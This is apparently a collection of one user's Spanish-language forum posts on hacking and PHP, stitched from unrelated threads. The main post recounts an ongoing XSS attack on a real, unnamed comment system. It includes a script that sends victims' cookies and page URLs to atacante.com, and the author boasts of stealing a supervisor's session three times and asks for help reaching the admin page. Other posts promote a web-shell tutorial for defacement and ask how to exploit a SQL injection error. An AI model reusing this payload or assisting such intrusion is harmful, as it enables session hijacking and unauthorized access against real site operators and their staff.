Mensajes

Es dificil saber puesto que quizas sea una medida de seguridad, aignar ese tiempo de vida para esa session.

y si uso la cookie al instante?
creo que se puede con sockets, asi aunque sea puedo guardar las paginas que puede ver y saber si hay algun upload o algo que me sirva, pero no tengo idea de como usarlos, alguien tendra un tutorial?

[linea de escape en el msg]

hola  !.
Pues necesito su ayuda, asi esta la cosa:
Existe un sistema en donde tu pones tu duda, sugerencia, comentario etc.. y una persona te responde a tu comentario (en un par de dias ) bueno, la cuestion es que ese sistema es vulnerable a xss (lo se por que ya he hecho pruebas), el sistema al que estoy atacando es completamente desconocido (yo envio el comentario y puedo verlo desde el punto de vista de un usuario comun, pero no tengo idea de lo que ve el encargado) nisiquiera se puede saber en que pagina va a ser visualizado el mensage, entonces lo que hice fue esto:
linea de escape en el msg

Código (html) [Seleccionar] Expandir

<script src=http://atacante.com/script.js ></script>

script.js

Código ( ‫javascript) [Seleccionar] Expandir

window.onload=function(){
var a = document.getElementsByTagName("body");
var ar = a[0];
ar.innerHTML += "<img height=1 width=1 src=http://atacante.com/script.php?ref="+escape(document.location)+"&cook="+escape(document.cookie)+" >";
}
asi consigo la cookie y tambien se donde usarla =D

El problema es que el sistema se desloguea automaticamente despues de 10 mins de no hacer nada,
todo el sistema esta administrado por sessiones (entonces capturar la cookie no me ayuda a descifrar nada).

Ya he conseguido la cookie del supervisor 3 veces, tambien se donde esta la pagina de administracion pero el problema es que cuando intento usar la session obtenida ya esta caducada, no tienen alguna idea de como puedo avanzar?

saludos!

Una pregunta, de donde se puede sacar el logo (aparte de la pagina principal)? 


xD, no se si participar, se photoshop, pero no soy muuuy creativo xD

yo lo sace de i.elhacker.net (un png con transparencia =D)

tendre 17 en septiembre =D

Gracias... estoy tratando de... Usar el codigo Erika... pero una pregunta eso que tu dices de "Hacerlo con cookies" es por que los datos se guardarian en las cookies?. Por que de ser asi no me sirve por que solo lo podria ver en mi computadora pero en otra no. Verdad?

entonces quieres hacer una especie de libro de visitas pero con 3 campos y que cualquier usuario lo pueda editar?
simple, php + xml
y te haorras la base de datos  

entonces quieres que te hagan todo el trabajo?

[deface.]

Hola bueno aqui les traigo un video tutorial explicando que es una shell y sus funciones basicas la shell usada en el video tutorial es la Storm es una shell muy completa y muchisimo mejor que la C99 este video es algo basico asi que les sera de ayuda a los nuevos en el deface.

existen reglas en el for y "defacear" va contra las reglas
tal vez el tuto este bien, pero que digas que sirve a los novatos en el deface puede hacer que te borren el tema

hola!

en algunos buscadores si buscas ' te da un error diciendo q tienes 1 fallo SQL... Cómo se podría explotar eso?

gracias

salu2

pues tecnicamente esta haciendo un llamado a una tabla que solo tiene informacion de busquedas, pero alomejor puedes encontrar algo mas con UNION

entonces en la 1.5.7 ya no sirve?
pero si en este momento esta la 1.5.13
yo pense que eso era nuevo 

Creo yo que aqui ya dijeron la respuesta 
y procura usar mysql_fetch_assoc, genera un array mas pequeño, es bastante util si queremos reducir consumo de recursos

bueno, ya probe poniendo retun array["name"]
y nada, el problema es que
me da error al llamar la clase, antes de que use el metodo exraer registro, ya me sale el warning entonces
voy a omitir el warning con una @ y lo pruebo aver que pasa